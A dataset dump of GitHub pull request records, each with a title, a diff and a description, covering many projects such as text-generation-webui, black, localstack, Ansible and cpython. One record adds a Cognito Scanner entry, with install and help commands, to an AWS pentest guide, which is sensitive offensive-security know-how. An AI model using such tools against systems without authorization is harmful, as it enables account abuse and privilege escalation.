title
stringlengths
2
169
diff
stringlengths
235
19.5k
body
stringlengths
0
30.5k
url
stringlengths
48
84
created_at
stringlengths
20
20
closed_at
stringlengths
20
20
merged_at
stringlengths
20
20
updated_at
stringlengths
20
20
diff_len
float64
101
3.99k
repo_name
stringclasses
83 values
__index_level_0__
int64
15
52.7k
optimize stopping strings processing
diff --git a/modules/callbacks.py b/modules/callbacks.py index 51ecbdd72d..a91c94a04d 100644 --- a/modules/callbacks.py +++ b/modules/callbacks.py @@ -9,25 +9,30 @@ import modules.shared as shared -# Copied from https://github.com/PygmalionAI/gradio-ui/ class _SentinelTokenStoppingCriteria(transformers.StoppingCriteria): def __init__(self, sentinel_token_ids: list, starting_idx: int): transformers.StoppingCriteria.__init__(self) self.sentinel_token_ids = sentinel_token_ids self.starting_idx = starting_idx + self.shortest = min([x.shape[-1] for x in sentinel_token_ids]) def __call__(self, input_ids: torch.LongTensor, _scores: torch.FloatTensor) -> bool: for sample in input_ids: trimmed_sample = sample[self.starting_idx:] + trimmed_len = trimmed_sample.shape[-1] + if trimmed_len < self.shortest: + continue - for i in range(len(self.sentinel_token_ids)): - # Can't unfold, output is still too tiny. Skip. - if trimmed_sample.shape[-1] < self.sentinel_token_ids[i].shape[-1]: + for sentinel in self.sentinel_token_ids: + sentinel_len = sentinel.shape[-1] + if trimmed_len < sentinel_len: continue - for window in trimmed_sample.unfold(0, self.sentinel_token_ids[i].shape[-1], 1): - if torch.all(torch.eq(self.sentinel_token_ids[i][0], window)): - return True + + window = trimmed_sample[-sentinel_len:] + if torch.all(torch.eq(sentinel, window)): + return True + return False
# TLDR Having a bunch of `custom_stopping_strings` made generation really slow. This PR makes it go fast again. # Technical detail The code for stopping tokens essentially just, repeatedly scanned the *entire* generated content for stop strings. In theory this sounds fine, until you realize: the callback is ran once per token generated. (This is the core principle for how streaming even works! It uses a fake stop string processor as a callback provider!) Which means, in practice, that the stop string calculations get slower and slower as the number of tokens gets longer, for no actual reason! When you have many stop strings x many tokens being generated, you have exponential slowdown. I rewrote the code to only check the most recently generated token(s) for a match. I also added a few small bonus opti tricks (precomputed a few values to avoid repeated calculation of unchanging values). If you consider stop string count to be constant and number of tokens as `n`, this converts the algorithm from `O(n)` to `O(1)` time complexity. If you consider stop-string count to be variable `k` then it changes from `O(nk)` to `O(k)`. # When It Matters Only matters if you have a bunch of stopping strings. For my test, I run LLaMA-7B with a bunch of random stop strings: `"waffle", "taco", "waffles", "tacos", "potato", "potatoes", "chihuahua", "chihuahuas", "dog", "dogs", "doggos", "doggo", "doggy", "doggies", "long word", "long words", "short word", "short words", "fsa", "afsfsa", "asfw2q", "124r", "5231", "421", "67853", "1223", "1224112", "6694727", "211245219", "12124", "52153", "asggaghd", "hgdasd", "saftwq623q", "adbagsbgas", "asgghewet", "t3w1253wet", "235teqwhsd", "adsghd5a", "523aega"` This was originally reported as an issue by `DeSinc` on Discord, who had 30 stop strings and presumably a much more legitimate set of stop strings than my random text lol. This actually also applies when there aren't so many stop tokens, albeit less difference overall. This matters more for small models (like 7B) because a smaller percentage of time is spent in the GPU generating vs. on the CPU doing side processing like stop token checks. For larger models that only get 1t/s anyway, the time difference proportionally matters less. # Testing I tested (A) the speed boost and (B) that stop strings work as intended, both on `--no-stream` and streaming mode, in chat mode. Everything worked as intended in my testing. In regards to performance, I present a testing result table, and before/after gifs to show the real-world difference. Testing on LLaMA-7B generating a paragraph: stops | Old | New ---|---|--- 43 stop strings | potato | 41t/s 3 stop strings (default) | 33t/s | 43t/s As you can see, on the new code, even without extra stopping strings, the tokens/sec is actually faster! 43 stop strings+old I listed as `potato` because, well, see gif below. It starts fast but rapidly slows to a crawl. Roughly 2t/s maybe when it hit the 200 token gen limit. ### Before: ![stopstring_slowdown](https://github.com/oobabooga/text-generation-webui/assets/4000772/7e1c85e4-bc9e-4538-b837-6baaed51172a) ### After: ![stopstring_fast](https://github.com/oobabooga/text-generation-webui/assets/4000772/abdc2bb6-e1a6-47cd-a3dc-009b891ea7a2) You can see in the "Before" that as more tokens are generated, it gets progressively slower, as it is a more aggressive loop.
https://api.github.com/repos/oobabooga/text-generation-webui/pulls/1625
2023-04-28T12:51:00Z
2023-05-02T04:21:55Z
2023-05-02T04:21:55Z
2024-03-03T00:00:02Z
398
oobabooga/text-generation-webui
26,462
Fix typos
diff --git a/docs/contributors/README.md b/docs/contributors/README.md index 20b3c278fb..9a739cd543 100644 --- a/docs/contributors/README.md +++ b/docs/contributors/README.md @@ -1,3 +1,3 @@ -Here we maintain a database of contributors, from which we generate credits on release blog posts and social medias. +Here we maintain a database of contributors, from which we generate credits on release blog posts and social media. For the HTTPie blog see: <https://httpie.io/blog>. diff --git a/docs/installation/generate.py b/docs/installation/generate.py index a67389ddd5..0597a3a429 100644 --- a/docs/installation/generate.py +++ b/docs/installation/generate.py @@ -55,7 +55,7 @@ def build_docs_structure(database: Database): tree = database[KEY_DOC_STRUCTURE] structure = [] for platform, tools_ids in tree.items(): - assert platform.isalnum(), f'{platform=} must be alpha-numeric for generated links to work' + assert platform.isalnum(), f'{platform=} must be alphanumeric for generated links to work' platform_tools = [tools[tool_id] for tool_id in tools_ids] structure.append((platform, platform_tools)) return structure diff --git a/extras/profiling/benchmarks.py b/extras/profiling/benchmarks.py index c7374f6abe..9d409debbe 100644 --- a/extras/profiling/benchmarks.py +++ b/extras/profiling/benchmarks.py @@ -13,7 +13,7 @@ Examples: - # Run everything as usual, the default is that we do 3 warmup runs + # Run everything as usual, the default is that we do 3 warm-up runs # and 5 actual runs. $ python extras/profiling/benchmarks.py @@ -188,7 +188,7 @@ def run(self, context: Context) -> pyperf.Benchmark: def main() -> None: # PyPerf will bring it's own argument parser, so configure the script. # The somewhat fast and also precise enough configuration is this. We run - # benchmarks 3 times to warmup (e.g especially for download benchmark, this + # benchmarks 3 times to warm up (e.g especially for download benchmark, this # is important). And then 5 actual runs where we record. sys.argv.extend( ['--worker', '--loops=1', '--warmup=3', '--values=5', '--processes=2']
Found via `codespell -L datas`.
https://api.github.com/repos/httpie/cli/pulls/1431
2022-08-24T13:29:17Z
2022-10-01T10:34:41Z
2022-10-01T10:34:41Z
2022-10-01T10:53:30Z
586
httpie/cli
33,834
feat: add cognito-scanner tool for AWS pentest
diff --git a/Methodology and Resources/Cloud - AWS Pentest.md b/Methodology and Resources/Cloud - AWS Pentest.md index fc8d99993b..e696fd04c3 100644 --- a/Methodology and Resources/Cloud - AWS Pentest.md +++ b/Methodology and Resources/Cloud - AWS Pentest.md @@ -185,6 +185,17 @@ find_admins: Look at IAM policies to identify admin users and roles, or principals with specific privileges ``` +* [Cognito Scanner](https://github.com/padok-team/cognito-scanner) - A CLI tool for executing attacks on cognito such as *Unwanted account creation*, *Account Oracle* and *Identity Pool escalation*. + ```bash + # Installation + $ pip install cognito-scanner + # Usage + $ cognito-scanner --help + # Get information about how to use the unwanted account creation script + $ cogntio-scanner account-creation --help + # For more details go to https://github.com/padok-team/cognito-scanner + ``` + * [dufflebag](https://labs.bishopfox.com/dufflebag) - Find secrets that are accidentally exposed via Amazon EBS's "public" mode * [NetSPI/AWS Consoler](https://github.com/NetSPI/aws_consoler) - Convert AWS Credentials into a console access
Cognito Scanner is a CLI open-source tool. It enables to pentest Cognito AWS instance easily. It can be installed through a python package
https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/663
2023-08-08T08:43:54Z
2023-10-09T21:19:43Z
2023-10-09T21:19:43Z
2023-10-09T21:19:43Z
322
swisskyrepo/PayloadsAllTheThings
8,381
[MRG + 1] docs: Change example of KDTree to prevent DeprecationWarning
diff --git a/sklearn/neighbors/binary_tree.pxi b/sklearn/neighbors/binary_tree.pxi index de1e367b06461..db658f29b4d50 100755 --- a/sklearn/neighbors/binary_tree.pxi +++ b/sklearn/neighbors/binary_tree.pxi @@ -293,11 +293,10 @@ Examples Query for k-nearest neighbors >>> import numpy as np - >>> np.random.seed(0) >>> X = np.random.random((10, 3)) # 10 points in 3 dimensions >>> tree = {BinaryTree}(X, leaf_size=2) # doctest: +SKIP - >>> dist, ind = tree.query(X[0], k=3) # doctest: +SKIP + >>> dist, ind = tree.query([X[0]], k=3) # doctest: +SKIP >>> print ind # indices of 3 closest neighbors [0 3 1] >>> print dist # distances to 3 closest neighbors
<!-- Thanks for contributing a pull request! Please ensure you have taken a look at the contribution guidelines: https://github.com/scikit-learn/scikit-learn/blob/master/CONTRIBUTING.md#Contributing-Pull-Requests --> #### Reference Issue Fixes #6906 <!-- Example: Fixes #1234 --> #### What does this implement/fix? Explain your changes. - fill in missing import statement of sklearn.neighbors.KDTree - wrap X in a list #### Any other comments? <!-- Please be aware that we are a loose team of volunteers so patience is necessary; assistance handling other issues is very welcome. We value all user contributions, no matter how minor they are. If we are slow to review, either the pull request needs some benchmarking, tinkering, convincing, etc. or more likely the reviewers are simply busy. In either case, we ask for your understanding during the review process. For more information, see our FAQ on this topic: http://scikit-learn.org/dev/faq.html#why-is-my-pull-request-not-getting-any-attention. Thanks for contributing! --> - fill in missing import statement of sklearn.neighbors.KDTree - wrap X in a list Changes to be committed: modified: sklearn/neighbors/binary_tree.pxi Resolves: #6906
https://api.github.com/repos/scikit-learn/scikit-learn/pulls/6962
2016-07-06T17:22:11Z
2016-07-16T08:08:46Z
2016-07-16T08:08:46Z
2016-07-16T08:08:49Z
240
scikit-learn/scikit-learn
46,725
[3.10] Add missing 'is' to `cmath.log()` docstring (GH-102049)
diff --git a/Modules/clinic/cmathmodule.c.h b/Modules/clinic/cmathmodule.c.h index 4b6653aa219422..d4779a98d803ce 100644 --- a/Modules/clinic/cmathmodule.c.h +++ b/Modules/clinic/cmathmodule.c.h @@ -638,7 +638,7 @@ PyDoc_STRVAR(cmath_log__doc__, "\n" "log(z[, base]) -> the logarithm of z to the given base.\n" "\n" -"If the base not specified, returns the natural logarithm (base e) of z."); +"If the base is not specified, returns the natural logarithm (base e) of z."); #define CMATH_LOG_METHODDEF \ {"log", (PyCFunction)(void(*)(void))cmath_log, METH_FASTCALL, cmath_log__doc__}, @@ -953,4 +953,4 @@ cmath_isclose(PyObject *module, PyObject *const *args, Py_ssize_t nargs, PyObjec exit: return return_value; } -/*[clinic end generated code: output=353347db2e808e0d input=a9049054013a1b77]*/ +/*[clinic end generated code: output=717d3d9f0640e893 input=a9049054013a1b77]*/ diff --git a/Modules/cmathmodule.c b/Modules/cmathmodule.c index 0f22049a170848..0c3241fd4b4f5e 100644 --- a/Modules/cmathmodule.c +++ b/Modules/cmathmodule.c @@ -950,12 +950,12 @@ cmath.log log(z[, base]) -> the logarithm of z to the given base. -If the base not specified, returns the natural logarithm (base e) of z. +If the base is not specified, returns the natural logarithm (base e) of z. [clinic start generated code]*/ static PyObject * cmath_log_impl(PyObject *module, Py_complex x, PyObject *y_obj) -/*[clinic end generated code: output=4effdb7d258e0d94 input=230ed3a71ecd000a]*/ +/*[clinic end generated code: output=4effdb7d258e0d94 input=e1f81d4fcfd26497]*/ { Py_complex y;
Fix missing 'is' in cmath.log() docstring. (cherry picked from commit 71f614ef2a3d66213b9cae807cbbc1ed03741221) Automerge-Triggered-By: GH:mdickinson
https://api.github.com/repos/python/cpython/pulls/102280
2023-02-26T13:33:45Z
2023-02-26T14:56:11Z
2023-02-26T14:56:11Z
2023-02-26T14:56:20Z
529
python/cpython
3,993
Fix a typo
diff --git a/README.md b/README.md index e2cd15563..55828052a 100644 --- a/README.md +++ b/README.md @@ -175,7 +175,7 @@ using the matched rule and runs it. Rules enabled by default are as follows: * `git_pull_clone` &ndash; clones instead of pulling when the repo does not exist; * `git_push` &ndash; adds `--set-upstream origin $branch` to previous failed `git push`; * `git_push_pull` &ndash; runs `git pull` when `push` was rejected; -* `git_rebase_no_changes` &ndash runs `git rebase --skip` instead of `git rebase --continue` when there are no changes; +* `git_rebase_no_changes` &ndash; runs `git rebase --skip` instead of `git rebase --continue` when there are no changes; * `git_rm_recursive` &ndash; adds `-r` when you try to `rm` a directory; * `git_remote_seturl_add` &ndash; runs `git remote add` when `git remote set_url` on nonexistant remote; * `git_stash` &ndash; stashes you local modifications before rebasing or switching branch;
https://api.github.com/repos/nvbn/thefuck/pulls/518
2016-06-23T12:33:47Z
2016-06-27T20:15:41Z
2016-06-27T20:15:41Z
2016-06-27T20:15:41Z
282
nvbn/thefuck
30,765
Fix: EventBus: match null value for anything-but rule
diff --git a/localstack/services/events/provider.py b/localstack/services/events/provider.py index f34c1fe47c006..5cf2125b6b82c 100644 --- a/localstack/services/events/provider.py +++ b/localstack/services/events/provider.py @@ -516,9 +516,9 @@ def filter_event_based_on_event_format( ): def filter_event(event_pattern_filter: Dict[str, Any], event: Dict[str, Any]): for key, value in event_pattern_filter.items(): - # match keys in the event in a case-agnostic way - event_value = event.get(key.lower(), event.get(key)) - if event_value is None: + fallback = object() + event_value = event.get(key.lower(), event.get(key, fallback)) + if event_value is fallback: return False # 1. check if certain values in the event do not match the expected pattern diff --git a/tests/aws/services/events/test_events.py b/tests/aws/services/events/test_events.py index 7aa2c5ab458b8..65fba00aa15b5 100644 --- a/tests/aws/services/events/test_events.py +++ b/tests/aws/services/events/test_events.py @@ -393,17 +393,20 @@ def _put_events_with_filter_to_sqs( assert rs["FailedEntries"] == [] try: + messages = [] for entry_asserts in entries_asserts: entries = entry_asserts[0] for entry in entries: entry.setdefault("EventBusName", bus_name) - self._put_entries_assert_results_sqs( + message = self._put_entries_assert_results_sqs( events_client, sqs_client, queue_url, entries=entries, should_match=entry_asserts[1], ) + if message is not None: + messages.extend(message) finally: clean_up( bus_name=bus_name, @@ -412,6 +415,8 @@ def _put_events_with_filter_to_sqs( queue_url=queue_url, ) + return messages + yield _put_events_with_filter_to_sqs def _put_entries_assert_results_sqs( @@ -433,10 +438,64 @@ def get_message(queue_url): actual_event = json.loads(messages[0]["Body"]) if "detail" in actual_event: self.assert_valid_event(actual_event) + return messages else: assert not messages + return None + + @markers.aws.validated + def test_put_events_with_rule_anything_but_to_sqs( + self, put_events_with_filter_to_sqs, snapshot + ): + snapshot.add_transformer( + [ + snapshot.transform.key_value("MD5OfBody"), + snapshot.transform.key_value("ReceiptHandle"), + snapshot.transform.jsonpath("$..EventBusName", "event-bus-name"), + ] + ) - return messages + event_detail_match = {"command": "display-message", "payload": "baz"} + event_detail_null = {"command": None, "payload": "baz"} + event_detail_no_match = {"command": "no-message", "payload": "baz"} + test_event_pattern_anything_but = { + "source": ["core.update-account-command"], + "detail-type": ["core.update-account-command"], + "detail": {"command": [{"anything-but": ["no-message"]}]}, + } + entries_match = [ + { + "Source": test_event_pattern_anything_but["source"][0], + "DetailType": test_event_pattern_anything_but["detail-type"][0], + "Detail": json.dumps(event_detail_match), + } + ] + entries_match_null = [ + { + "Source": test_event_pattern_anything_but["source"][0], + "DetailType": test_event_pattern_anything_but["detail-type"][0], + "Detail": json.dumps(event_detail_null), + } + ] + entries_no_match = [ + { + "Source": test_event_pattern_anything_but["source"][0], + "DetailType": test_event_pattern_anything_but["detail-type"][0], + "Detail": json.dumps(event_detail_no_match), + } + ] + + entries_asserts = [ + (entries_match, True), + (entries_match_null, True), + (entries_no_match, False), + ] + + messages = put_events_with_filter_to_sqs( + pattern=test_event_pattern_anything_but, + entries_asserts=entries_asserts, + ) + snapshot.match("rule-anything-but", messages) # TODO: further unify/parameterize the tests for the different target types below diff --git a/tests/aws/services/events/test_events.snapshot.json b/tests/aws/services/events/test_events.snapshot.json index 8cd4dd04ee358..2ffed622b6800 100644 --- a/tests/aws/services/events/test_events.snapshot.json +++ b/tests/aws/services/events/test_events.snapshot.json @@ -247,5 +247,50 @@ } } } + }, + "tests/aws/services/events/test_events.py::TestEvents::test_put_events_with_rule_anything_but_to_sqs": { + "recorded-date": "21-12-2023, 13:00:42", + "recorded-content": { + "rule-anything-but": [ + { + "MessageId": "<uuid:1>", + "ReceiptHandle": "<receipt-handle:1>", + "MD5OfBody": "<m-d5-of-body:1>", + "Body": { + "version": "0", + "id": "<uuid:2>", + "detail-type": "core.update-account-command", + "source": "core.update-account-command", + "account": "111111111111", + "time": "date", + "region": "<region>", + "resources": [], + "detail": { + "command": "display-message", + "payload": "baz" + } + } + }, + { + "MessageId": "<uuid:3>", + "ReceiptHandle": "<receipt-handle:2>", + "MD5OfBody": "<m-d5-of-body:2>", + "Body": { + "version": "0", + "id": "<uuid:4>", + "detail-type": "core.update-account-command", + "source": "core.update-account-command", + "account": "111111111111", + "time": "date", + "region": "<region>", + "resources": [], + "detail": { + "command": null, + "payload": "baz" + } + } + } + ] + } } }
<!-- Please refer to the contribution guidelines before raising a PR: https://github.com/localstack/localstack/blob/master/CONTRIBUTING.md --> <!-- Why am I raising this PR? Add context such as related issues, PRs, or documentation. --> ## Motivation As reported in [#9711](https://github.com/localstack/localstack/issues/9711) the current behavior does not fully match the aws cli behavior regarding the EventBridge pattern `anything-but` and a `null` value. This rule: ``` { "source": ["core.update-account-command"], "detail-type": ["core.update-account-command"], "detail": {"command": [{"anything-but": ["no-message"]}]}, } ``` In combination with this message: ``` { "version": "0", "id": "<uuid:2>", "detail-type": "core.update-account-command", "source": "core.update-account-command", "account": "111111111111", "time": "date", "region": "<region>", "resources": [], "detail": { "command": null, "payload": "baz" } } ``` does not match on LocalStack, but does correctly match on AWS. The issue arises from using the default fallback of the getter while matching event patterns, that also resolves to `None` and thus fields with `None` values are also excluded. <!-- What notable changes does this PR make? --> ## Changes Replace the default fallback while matching event patterns with a custom string. Potential pitfalls: in the rare circumstance, that the custom string is also used as a value in a message, the pattern matching will not have the desired outcome. ## Testing To extend snapshot testing for event messages, the custom fixture that handles setting up the perquisites, posting the message, retrieving the message and comparing it was extended to return the message content. Although comparing expected and actual massage values is still handled inside the fixture, additional snapshot matching is implemented to ensure AWS parity. <!-- The following sections are optional, but can be useful! ## TODO What's left to do: - [ ] ... - [ ] ... -->
https://api.github.com/repos/localstack/localstack/pulls/9925
2023-12-21T12:44:29Z
2023-12-22T14:30:35Z
2023-12-22T14:30:35Z
2024-01-22T17:33:21Z
1,507
localstack/localstack
28,458
remove --py36
diff --git a/README.md b/README.md index 57272aefc3..8df2f9edc3 100644 --- a/README.md +++ b/README.md @@ -77,11 +77,6 @@ Options: Python versions that should be supported by Black's output. [default: per-file auto- detection] - --py36 Allow using Python 3.6-only syntax on all - input files. This will put trailing commas - in function signatures and calls also after - *args and **kwargs. [default: per-file - auto-detection] --pyi Format all input files like typing stubs regardless of file extension (useful when piping source on standard input). @@ -576,7 +571,7 @@ to denote a significant space character. ```toml [tool.black] line-length = 88 -py36 = true +target_version = ['cpy37'] include = '\.pyi?$' exclude = ''' @@ -944,6 +939,8 @@ More details can be found in [CONTRIBUTING](CONTRIBUTING.md). ### 19.2b0 +* removed `--py36` (use `--target-version=cpy36` instead) (#724) + * long `del` statements are now split into multiple lines (#698) * *Black* no longer normalizes numeric literals to include `_` separators (#696) diff --git a/black.py b/black.py index 8f50d3e217..2850ae1a19 100644 --- a/black.py +++ b/black.py @@ -248,15 +248,6 @@ def read_pyproject_toml( "per-file auto-detection]" ), ) -@click.option( - "--py36", - is_flag=True, - help=( - "Allow using Python 3.6-only syntax on all input files. This will put " - "trailing commas in function signatures and calls also after *args and " - "**kwargs. [default: per-file auto-detection]" - ), -) @click.option( "--pyi", is_flag=True, @@ -360,7 +351,6 @@ def main( diff: bool, fast: bool, pyi: bool, - py36: bool, skip_string_normalization: bool, quiet: bool, verbose: bool, @@ -372,13 +362,7 @@ def main( """The uncompromising code formatter.""" write_back = WriteBack.from_configuration(check=check, diff=diff) if target_version: - if py36: - err(f"Cannot use both --target-version and --py36") - ctx.exit(2) - else: - versions = set(target_version) - elif py36: - versions = PY36_VERSIONS + versions = set(target_version) else: # We'll autodetect later. versions = set() @@ -2446,8 +2430,8 @@ def delimiter_split( ) -> Iterator[Line]: """Split according to delimiters of the highest priority. - If `py36` is True, the split will add trailing commas also in function - signatures that contain `*` and `**`. + If `supports_trailing_commas` is True, the split will add trailing commas + also in function signatures that contain `*` and `**`. """ try: last_leaf = line.leaves[-1] diff --git a/pyproject.toml b/pyproject.toml index fca50554ed..c42c33f37b 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -7,7 +7,7 @@ [tool.black] line-length = 88 -py36 = true +target_version = ['cpy36', 'cpy37', 'cpy38'] include = '\.pyi?$' exclude = ''' /( diff --git a/tests/test_black.py b/tests/test_black.py index 3404e058e1..21a7f2d53b 100644 --- a/tests/test_black.py +++ b/tests/test_black.py @@ -43,6 +43,9 @@ THIS_FILE = Path(__file__) THIS_DIR = THIS_FILE.parent EMPTY_LINE = "# EMPTY LINE WITH WHITESPACE" + " (this comment will be removed)" +PY36_ARGS = [ + f"--target-version={version.name.lower()}" for version in black.PY36_VERSIONS +] T = TypeVar("T") R = TypeVar("R") @@ -1160,10 +1163,10 @@ def test_single_file_force_py36(self) -> None: path = (workspace / "file.py").resolve() with open(path, "w") as fh: fh.write(source) - self.invokeBlack([str(path), "--py36"]) + self.invokeBlack([str(path), *PY36_ARGS]) with open(path, "r") as fh: actual = fh.read() - # verify cache with --py36 is separate + # verify cache with --target-version is separate py36_cache = black.read_cache(py36_mode) self.assertIn(path, py36_cache) normal_cache = black.read_cache(reg_mode) @@ -1183,12 +1186,12 @@ def test_multi_file_force_py36(self) -> None: for path in paths: with open(path, "w") as fh: fh.write(source) - self.invokeBlack([str(p) for p in paths] + ["--py36"]) + self.invokeBlack([str(p) for p in paths] + PY36_ARGS) for path in paths: with open(path, "r") as fh: actual = fh.read() self.assertEqual(actual, expected) - # verify cache with --py36 is separate + # verify cache with --target-version is separate pyi_cache = black.read_cache(py36_mode) normal_cache = black.read_cache(reg_mode) for path in paths: @@ -1198,7 +1201,9 @@ def test_multi_file_force_py36(self) -> None: def test_pipe_force_py36(self) -> None: source, expected = read_data("force_py36") result = CliRunner().invoke( - black.main, ["-", "-q", "--py36"], input=BytesIO(source.encode("utf8")) + black.main, + ["-", "-q", "--target-version=cpy36"], + input=BytesIO(source.encode("utf8")), ) self.assertEqual(result.exit_code, 0) actual = result.output
Fixes #703.
https://api.github.com/repos/psf/black/pulls/724
2019-02-23T05:58:41Z
2019-02-24T17:15:04Z
2019-02-24T17:15:04Z
2019-02-24T17:15:08Z
1,471
psf/black
24,317
fix(bug): toml misconfiguration
diff --git a/pyproject.toml b/pyproject.toml index 52bd0b921a..fd505f4dbf 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -11,6 +11,7 @@ dependencies = [ 'black == 23.3.0', 'openai == 0.27.8', 'ruff == 0.0.272', + 'pre-commit == 3.3.3', 'typer == 0.9.0' ]
"pre-commit: command not found" was generated upon clean codepsace; "pre-commit" was in /requirements.txt, but missing in .toml file. **Steps to reproduce** - create default Codespace - run `make install` - See error: `pre-commit: command not found`
https://api.github.com/repos/gpt-engineer-org/gpt-engineer/pulls/189
2023-06-19T07:18:36Z
2023-06-19T11:09:15Z
2023-06-19T11:09:15Z
2023-06-19T11:09:23Z
123
gpt-engineer-org/gpt-engineer
33,112
identity: Autodetect FreeIPA server with DNS
diff --git a/lib/ansible/module_utils/ipa.py b/lib/ansible/module_utils/ipa.py index 381afac7d12583..0d3eb1d3b45ead 100644 --- a/lib/ansible/module_utils/ipa.py +++ b/lib/ansible/module_utils/ipa.py @@ -28,13 +28,28 @@ # USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import json +import socket import re from ansible.module_utils._text import to_bytes, to_native, to_text from ansible.module_utils.six import PY3 from ansible.module_utils.six.moves.urllib.parse import quote from ansible.module_utils.urls import fetch_url -from ansible.module_utils.basic import env_fallback +from ansible.module_utils.basic import env_fallback, AnsibleFallbackNotFound + + +def _env_then_dns_fallback(*args, **kwargs): + ''' Load value from environment or DNS in that order''' + try: + return env_fallback(*args, **kwargs) + except AnsibleFallbackNotFound: + # If no host was given, we try to guess it from IPA. + # The ipa-ca entry is a standard entry that IPA will have set for + # the CA. + try: + return socket.gethostbyaddr(socket.gethostbyname('ipa-ca'))[0] + except Exception: + raise AnsibleFallbackNotFound class IPAClient(object): @@ -181,7 +196,7 @@ def modify_if_diff(self, name, ipa_list, module_list, add_method, remove_method, def ipa_argument_spec(): return dict( ipa_prot=dict(type='str', default='https', choices=['http', 'https'], fallback=(env_fallback, ['IPA_PROT'])), - ipa_host=dict(type='str', default='ipa.example.com', fallback=(env_fallback, ['IPA_HOST'])), + ipa_host=dict(type='str', default='ipa.example.com', fallback=(_env_then_dns_fallback, ['IPA_HOST'])), ipa_port=dict(type='int', default=443, fallback=(env_fallback, ['IPA_PORT'])), ipa_user=dict(type='str', default='admin', fallback=(env_fallback, ['IPA_USER'])), ipa_pass=dict(type='str', required=True, no_log=True, fallback=(env_fallback, ['IPA_PASS'])), diff --git a/lib/ansible/plugins/doc_fragments/ipa.py b/lib/ansible/plugins/doc_fragments/ipa.py index d2017b7e4eb70e..20f4c81a17d7c3 100644 --- a/lib/ansible/plugins/doc_fragments/ipa.py +++ b/lib/ansible/plugins/doc_fragments/ipa.py @@ -18,7 +18,9 @@ class ModuleDocFragment(object): description: - IP or hostname of IPA server. - If the value is not specified in the task, the value of environment variable C(IPA_HOST) will be used instead. - - If both the environment variable C(IPA_HOST) and the value are not specified in the task, then default value is set. + - If both the environment variable C(IPA_HOST) and the value are not specified in the task, then DNS will be used to try to discover the FreeIPA server. + - The relevant entry needed in FreeIPA is the 'ipa-ca' entry. + - If neither the DNS entry, nor the environment C(IPA_HOST), nor the value are available in the task, then the default value will be used. - 'Environment variable fallback mechanism is added in version 2.5.' default: ipa.example.com ipa_user:
##### SUMMARY This adds the ability for the freeIPA related modules to be able to auto-detect the IPA server through DNS. This takes advantage of the fact that a lot of FreeIPA deployments configure their hosts to use IPA as the nameserver. This check is only used if we didn't set neither the ipa_host parameter, nor the environment variable IPA_HOST. ##### ISSUE TYPE - Feature Pull Request ##### COMPONENT NAME identity ##### ADDITIONAL INFORMATION This makes it easier to use the IPA-related modules in the sense that one no longer needs to include the hostname of the IPA server if the nodes are enrolled to it and use IPA as the nameserver. This way, the module can be shared between deployments in a more general fashion. So, instead of always adding the host to create a service, like this: ``` - hosts: localhost tasks: - ipa_service: name: beer/some-host.mydomain.example.com state: present force: true ipa_host: ipa.mydomain.example.com ipa_user: admin ipa_pass: my-super-secret-password ``` you can now merely omit it as follows: ``` - hosts: localhost tasks: - ipa_service: name: beer/some-host.mydomain.example.com state: present force: true ipa_user: admin ipa_pass: my-super-secret-password ``` Assuming that the host that runs this resolves the appropriate DNS entries.
https://api.github.com/repos/ansible/ansible/pulls/50988
2019-01-16T16:37:49Z
2019-02-01T08:19:05Z
2019-02-01T08:19:05Z
2019-07-25T16:33:47Z
804
ansible/ansible
49,109
Add new algorithm for Armstrong numbers
diff --git a/maths/armstrong_numbers.py b/maths/armstrong_numbers.py index af25688dbacc..ce8c62182fd9 100644 --- a/maths/armstrong_numbers.py +++ b/maths/armstrong_numbers.py @@ -1,26 +1,24 @@ """ -An Armstrong number is equal to the sum of its own digits each raised -to the power of the number of digits. +An Armstrong number is equal to the sum of its own digits each raised to the +power of the number of digits. + For example, 370 is an Armstrong number because 3*3*3 + 7*7*7 + 0*0*0 = 370. -An Armstrong number is often called Narcissistic number. + +Armstrong numbers are also called Narcissistic numbers and Pluperfect numbers. + +On-Line Encyclopedia of Integer Sequences entry: https://oeis.org/A005188 """ +PASSING = (1, 153, 370, 371, 1634, 24678051, 115132219018763992565095597973971522401) +FAILING = (-153, -1, 0, 1.2, 200, "A", [], {}, None) def armstrong_number(n: int) -> bool: """ Return True if n is an Armstrong number or False if it is not. - >>> armstrong_number(153) + >>> all(armstrong_number(n) for n in PASSING) True - >>> armstrong_number(200) - False - >>> armstrong_number(1634) - True - >>> armstrong_number(0) - False - >>> armstrong_number(-1) - False - >>> armstrong_number(1.2) + >>> any(armstrong_number(n) for n in FAILING) False """ if not isinstance(n, int) or n < 1: @@ -43,15 +41,46 @@ def armstrong_number(n: int) -> bool: return n == sum -def narcissistic_number(n: int) -> bool: - """Return True if n is a narcissistic number or False if it is not""" +def pluperfect_number(n: int) -> bool: + """Return True if n is a pluperfect number or False if it is not + + >>> all(armstrong_number(n) for n in PASSING) + True + >>> any(armstrong_number(n) for n in FAILING) + False + """ + if not isinstance(n, int) or n < 1: + return False + + # Init a "histogram" of the digits + digit_histogram = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0] + digit_total = 0 + sum = 0 + temp = n + while temp > 0: + temp, rem = divmod(temp, 10) + digit_histogram[rem] += 1 + digit_total += 1 + + for (cnt, i) in zip(digit_histogram, range(len(digit_histogram))): + sum += cnt * i ** digit_total + + return n == sum - expo = len(str(n)) # power, all number will be raised to - # each digit will be multiplied expo times - temp = [(int(i) ** expo) for i in str(n)] - # check if sum of cube of each digit is equal to number - return n == sum(temp) +def narcissistic_number(n: int) -> bool: + """Return True if n is a narcissistic number or False if it is not. + + >>> all(armstrong_number(n) for n in PASSING) + True + >>> any(armstrong_number(n) for n in FAILING) + False + """ + if not isinstance(n, int) or n < 1: + return False + expo = len(str(n)) # the power that all digits will be raised to + # check if sum of each digit multiplied expo times is equal to number + return n == sum(int(i) ** expo for i in str(n)) def main(): @@ -61,6 +90,7 @@ def main(): num = int(input("Enter an integer to see if it is an Armstrong number: ").strip()) print(f"{num} is {'' if armstrong_number(num) else 'not '}an Armstrong number.") print(f"{num} is {'' if narcissistic_number(num) else 'not '}an Armstrong number.") + print(f"{num} is {'' if pluperfect_number(num) else 'not '}an Armstrong number.") if __name__ == "__main__":
